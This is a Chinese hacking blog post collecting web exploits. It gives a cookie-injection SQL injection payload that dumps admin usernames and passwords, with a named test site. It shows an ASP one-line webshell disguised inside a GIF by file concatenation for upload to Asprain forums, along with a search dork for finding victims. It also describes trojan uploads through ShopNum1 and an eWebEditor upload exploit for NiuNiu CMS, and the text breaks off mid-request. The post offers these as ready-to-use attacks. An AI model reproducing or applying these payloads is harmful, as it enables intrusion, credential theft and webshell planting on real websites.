您现在的位置:首页 > 博客 > 文 章 > 网路技术文 > 正文
目前曝光的主流WEB漏洞,Exp利用合集
http://www.hackyh.com/      2018-3-5 3:13:36      来源:小娄博客      点击:
直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 

1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.52galaxy.cn/system/xitong/shownews.asp?id=210
-----------------------------------------------------------------------------------------------------
Asprain论坛 注册用户 上传图片就可拿到webshell

Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设

内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
2.gif 为一小图片文件,一定要小,比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5.q.asp;.gif
google:Powered by Asprain
-----------------------------------------------------------------------------------------------------
ShopNum1全部系统存在上传漏洞。

首先 在 http://www.52galaxy.cn/product.html 页面查看任意产品详细说明。
按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
http://www.52galaxy.cn/upload/20110720083822500.aspx
-----------------------------------------------------------------------------------------------------
牛牛CMS中小企业网站管理系统 上传漏洞

牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
后台:admin/login.asp
ewebeditor 5.5 Nday
exp:


action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?

enctype="multipart